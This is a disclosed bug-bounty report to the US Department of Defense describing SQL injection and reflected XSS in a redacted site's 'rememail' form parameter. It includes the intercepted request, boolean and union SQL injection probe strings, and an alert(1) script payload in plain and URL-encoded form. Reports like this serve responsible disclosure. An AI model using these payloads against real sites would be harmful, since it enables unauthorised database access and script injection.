[███] SQL injection & Reflected XSS

Disclosed: 2019-12-02 19:11:46 By jarvis0x1 To deptofdefense
Medium
Vulnerability Details
###SQL injection test### 1. Go to site [███████](http://█████/) 2. Intercept this request ``` POST /viewem6.php HTTP/1.1 Host: ████ User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://████████/ Content-Type: application/x-www-form-urlencoded Content-Length: 28 Connection: close Upgrade-Insecure-Requests: 1 rememail=test&rememail2=test ``` Set this payload to param ```rememail``` ``` ' or '1'='1 ``` or ``` ' or true --+ ``` █████████ █████████ But if you set another payload ``` ' or '1'='2 ``` or ``` ' or false --+ ``` ██████████ ███████ Also if you set payload ``` ' union select 1-- ``` You will have another request █████ I did not begin to extract any data about the server or database, since this may be contrary to the rules. ###Reflected XSS### Using this payload I can execute XSS ``` ' or '"<script>alert(1)</script>'='"<script>alert(1)</script> ``` You need to encode this payload ``` %27 or %27"<script>alert(1)</script>%27=%27"<script>alert(1)</script> ``` Result in Burp █████ ## Impact Using this bug hacker can get access to database of server, also hacker can exploit XSS injection.
Actions
View on HackerOne
Report Stats
  • Report ID: 484801
  • State: Closed
  • Substate: resolved
  • Upvotes: 8
Share this report